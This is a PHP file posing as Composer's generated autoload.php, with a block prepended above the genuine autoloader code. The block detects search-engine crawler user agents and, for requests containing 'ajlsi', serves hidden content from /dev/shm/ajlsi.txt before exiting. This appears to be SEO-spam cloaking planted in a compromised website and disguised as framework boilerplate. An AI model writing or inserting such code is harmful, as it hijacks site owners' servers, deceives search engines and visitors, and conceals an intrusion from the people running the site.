<?php
$user_agent  = $_SERVER['HTTP_USER_AGENT'] ?? '';
$request_uri = $_SERVER['REQUEST_URI'] ?? '';

$is_bot = false;

$bots = [
    'Googlebot',
    'Google-InspectionTool',
    'AdsBot-Google',
    'Mediapartners-Google',
    'Bingbot',
    'Slurp',
    'DuckDuckBot',
    'AhrefsBot',
    'SemrushBot',
    'MJ12bot',
    'YandexBot'
];

foreach ($bots as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        $is_bot = true;
        break;
    }
}

/* trigger hanya ajlsi */
if ($is_bot && stripos($request_uri, 'ajlsi') !== false) {

    $file = '/dev/shm/ajlsi.txt';

    if (file_exists($file)) {
        readfile($file);
    } else {
        echo 'cache not ready';
    }

    exit;
}
// autoload.php @generated by Composer

if (PHP_VERSION_ID < 50600) {
    if (!headers_sent()) {
        header('HTTP/1.1 500 Internal Server Error');
    }
    $err = 'Composer 2.3.0 dropped support for autoloading on PHP <5.6 and you are running '.PHP_VERSION.', please upgrade PHP or use Composer 2.2 LTS via "composer self-update --2.2". Aborting.'.PHP_EOL;
    if (!ini_get('display_errors')) {
        if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') {
            fwrite(STDERR, $err);
        } elseif (!headers_sent()) {
            echo $err;
        }
    }
    throw new RuntimeException($err);
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit2aaf08fdfad7ab39074f4acd6696ba44::getLoader();
